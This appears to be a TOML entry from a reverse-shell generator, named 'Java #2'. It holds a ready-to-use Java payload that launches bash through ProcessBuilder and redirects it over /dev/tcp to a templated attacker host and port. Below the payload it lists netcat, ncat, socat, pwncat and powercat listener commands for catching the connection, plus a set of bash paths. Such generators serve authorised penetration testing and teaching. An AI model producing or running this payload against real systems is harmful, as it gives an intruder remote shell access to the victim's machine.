id = "java_2"
name = "Java #2"
os = "unix"
type = "reverse"
proto = "tcp"
lang = "java"
description = "Java reverse shell using ProcessBuilder and bash."

payload = "public class shell { public static void main(String[] args) { ProcessBuilder pb = new ProcessBuilder(\"{{SHELL}}\", \"-c\", \"$@| {{SHELL}} -i >& /dev/tcp/{{LHOST}}/{{LPORT}} 0>&1\").redirectErrorStream(true); try { Process p = pb.start(); p.waitFor(); p.destroy(); } catch (Exception e) {} } }"

[listeners]
nc = "nc -lvnp {{LPORT}}"
nc_freebsd = "nc -lvn {{LPORT}}"
busybox_nc = "busybox nc -lp {{LPORT}}"
ncat = "ncat -lvnp {{LPORT}}"
ncat_exe = "ncat.exe -lvnp {{LPORT}}"
rlwrap_nc = "rlwrap -cAr nc -lvnp {{LPORT}}"
rustcat = "rcat listen {{LPORT}}"
pwncat = "python3 -m pwncat -lp {{LPORT}}"
socat = "socat -d -d TCP-LISTEN:{{LPORT}} STDOUT"
socat_tty = "socat -d -d file:`tty`,raw,echo=0 TCP-LISTEN:{{LPORT}}"
powercat = "powercat -l -p {{LPORT}}"

[shells]
compatible = [
	"/usr/bin/env bash", "bash", "/bin/bash", "/usr/bin/bash", "/usr/local/bin/bash", "/opt/homebrew/bin/bash", "/opt/local/bin/bash", "/snap/bin/bash", "/usr/sbin/bash", "/sbin/bash", "env bash"
]
default = "/bin/bash"
